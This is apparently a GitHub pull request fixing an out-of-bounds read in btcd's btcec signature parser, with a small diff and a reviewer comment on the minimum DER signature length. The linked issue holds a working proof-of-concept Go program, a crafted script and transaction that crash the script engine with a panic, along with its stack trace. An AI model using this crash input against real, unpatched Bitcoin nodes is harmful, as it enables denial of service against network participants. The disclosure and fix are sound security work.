### PR TITLE
btcec/signature: fix DoS bug with signature parsing

### LINKED ISSUE #1287: Script execution can lead to DoS (crash) due to OOB access in btcec.parseSig
```
$ GOPATH=`realpath .` go get github.com/btcsuite/btcd
$ cat txscript_poc.go 
package main

import (
    "github.com/btcsuite/btcd/txscript"
    "github.com/btcsuite/btcd/wire"
    "github.com/btcsuite/btcd/chaincfg/chainhash"
)

func main() {
    script := []byte{
        0x00, 0x5b, 0x5e, 0x5e, 0x5e, 0x5e, 0x5e, 0x30, 0x30, 0x00, 0x5b, 0x20,
        0x30, 0x30, 0x30, 0x32, 0x30, 0x30, 0x30, 0x36, 0x39, 0x33, 0x38, 0x36,
        0x30, 0x32, 0x5e, 0x5e, 0x5e, 0x80, 0x00, 0x00, 0x66, 0x09, 0x01, 0x02,
        0x00, 0x5e, 0x80, 0x00, 0x00, 0x66, 0x09, 0x01, 0x02, 0x09, 0x01, 0x02,
        0x00, 0x5e, 0x80, 0x00, 0x00, 0x66, 0x09, 0x03, 0x21, 0x02, 0x00, 0x00,
        0x00, 0x5e, 0xc7, 0xc7, 0x5e, 0x54, 0x5e, 0x5e, 0x5e, 0x5e, 0x5e, 0x5e,
        0x5e, 0x5e, 0x5e, 0x5e, 0x5e, 0x5e, 0xaa, 0xbb, 0x5e, 0x5e, 0x5e, 0x5e,
        0x5e, 0x5e, 0x70, 0x4e, 0x3b, 0x00, 0xac}

	tx := &wire.MsgTx{
		Version: 1,
		TxIn: []*wire.TxIn{
			{
				PreviousOutPoint: wire.OutPoint{
					Hash: chainhash.Hash([32]byte{
						0xc9, 0x97, 0xa5, 0xe5,
						0x6e, 0x10, 0x41, 0x02,
						0xfa, 0x20, 0x9c, 0x6a,
						0x85, 0x2d, 0xd9, 0x06,
						0x60, 0xa2, 0x0b, 0x2d,
						0x9c, 0x35, 0x24, 0x23,
						0xed, 0xce, 0x25, 0x85,
						0x7f, 0xcd, 0x37, 0x04,
					}),
					Index: 0,
				},
				SignatureScript: nil,
				Sequence:        4294967295,
			},
		},
		TxOut: []*wire.TxOut{{
			Value:    1000000000,
			PkScript: nil,
		}},
		LockTime: 0,
	}

	vm, err := txscript.NewEngine(script, tx, 0, 0, nil, nil, 0)
    if err != nil {
        return
    }

    vm.Execute()
}
$ GOPATH=`realpath .` go run txscript_poc.go 
panic: runtime error: index out of range

goroutine 1 [running]:
github.com/btcsuite/btcd/btcec.parseSig(0xc000022188, 0x2f, 0x53, 0x686b40, 0x75c740, 0xc000447b00, 0x4ceec9, 0x779c50, 0x66fb70)
	/home/jhg/btcd_poc/src/github.com/btcsuite/btcd/btcec/signature.go:122 +0xdf4
github.com/btcsuite/btcd/btcec.ParseSignature(0xc000022188, 0x2f, 0x53, 0x686b40, 0x75c740, 0x0, 0x0, 0x20)
	/home/jhg/btcd_poc/src/github.com/btcsuite/btcd/btcec/signature.go:206 +0x58
github.com/btcsuite/btcd/txscript.opcodeCheckSig(0xc00047e120, 0xc00047c000, 0x0, 0x0)
	/home/jhg/btcd_poc/src/github.com/btcsuite/btcd/txscript/opcode.go:2126 +0xa26
github.com/btcsuite/btcd/txscript.(*Engine).executeOpcode(0xc00047c000, 0xc00047e120, 0x0, 0x10)
	/home/jhg/btcd_poc/src/github.com/btcsuite/btcd/txscript/engine.go:205 +0x2b0
github.com/btcsuite/btcd/txscript.(*Engine).Step(0xc00047c000, 0x542514, 0x2, 0xc000010980)
	/home/jhg/btcd_poc/src/github.com/btcsuite/btcd/txscript/engine.go:453 +0xa7
github.com/btcsuite/btcd/txscript.(*Engine).Execute(0xc00047c000, 0x5b, 0x5b)
	/home/jhg/btcd_poc/src/github.com/btcsuite/btcd/txscript/engine.go:540 +0x137
main.main()
	/home/jhg/btcd_poc/txscript_poc.go:53 +0x230
exit status 2
```

### PR DESCRIPTION
**Pull request by meyer9**
Fixes #1287 

Adds additional bounds check on signature length bit to ensure it's between the minimal message length and the length of the actual signature provided.

### CODE REVIEW

File: btcec/signature.go [hunk 1]
```diff
@@ -112,7 +112,10 @@ func parseSig(sigStr []byte, curve elliptic.Curve, der bool) (*Signature, error)
 	// length of remaining message
 	siglen := sigStr[index]
 	index++
-	if int(siglen+2) > len(sigStr) {
+
+	// siglen should be less than the entire message and greater than
+	// the minimal message of size 8.
```
Comment (Roasbeef) [inline btcec/signature.go]: We can add a comment that explains how a value of 8 was arrived at: 
```go
// minSigLen is the minimum length of a DER encoded signature and is
// when both R and S are 1 byte each.
// 0x30 + <1-byte> + 0x02 + 0x01 + <byte> + 0x2 + 0x01 + <byte>
```

While we're at it, we can lift the magic value of 8 into a constant above.
